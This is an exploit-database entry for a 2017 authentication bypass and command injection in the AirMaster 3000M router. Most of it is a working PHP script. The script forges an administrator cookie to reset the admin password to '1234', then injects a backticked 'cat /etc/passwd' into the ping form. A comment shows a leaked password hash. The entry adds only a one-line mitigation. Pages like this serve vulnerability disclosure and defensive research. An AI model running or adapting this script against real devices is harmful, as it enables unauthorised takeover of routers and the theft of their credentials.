header-logo
Suggest Exploit
vendor:
AirMaster 3000M
by:
Koorosh Ghorbani
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: AirMaster 3000M
Affected Version From: V2.0.1B1044
Affected Version To: V2.0.1B1044
Patch Exists: NO
Related CWE: N/A
CPE: h:mobinnet:airmaster_3000m
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GoAhead-Webs/2.5.0
2017

AirMaster 3000M multiple Vulnerabilities

This exploit allows an attacker to bypass authentication and execute arbitrary commands on the AirMaster 3000M router. The exploit uses a special cookie to bypass authentication and then uses a command injection vulnerability to execute arbitrary commands.

Mitigation:

Ensure that authentication is properly enforced and that user input is properly sanitized to prevent command injection.
Source

Exploit-DB raw data:

<?php
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
# Date: 2017/08/12
# Exploit Author: Koorosh Ghorbani
# Author Homepage: http://8thbit.net/
# Vendor Homepage: http://mobinnet.ir/
# Software Version: V2.0.1B1044
# Web Server: GoAhead-Webs/2.5.0

define('isDebug',false);
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
function changePassword(){
	$pw = "1234"; //New Password
	$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
	$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
		specialCookie,
		'Origin: http://192.168.1.1',
		'Content-Type: application/x-www-form-urlencoded',
	));
	curl_setopt($ch,CURLOPT_POST,1);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
	$response = curl_exec($ch);
	if($response == "success"){
		echo "New Password is : $pw\r\n";
	}else{
		echo "Failed\r\n";
	}
	if (isDebug){
		echo $response;
	}
}
function executeCommand(){
	$data = "pingAddr=`cat /etc/passwd`";
	$ch = curl_init('http://192.168.1.1/goform/startPing');
	curl_setopt($ch,CURLOPT_HTTPHEADER,array(
		specialCookie,
		'Origin: http://192.168.1.1',
		'Content-Type: application/x-www-form-urlencoded',
		"X-Requested-With: XMLHttpRequest",
		"Referer: http://192.168.1.1/diagnosis_ping.asp"
	));
	curl_setopt($ch,CURLOPT_POST,1);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
	curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
	$response = curl_exec($ch);
	echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
}
changePassword();

Navigation

Suggest Exploit

Services By CQR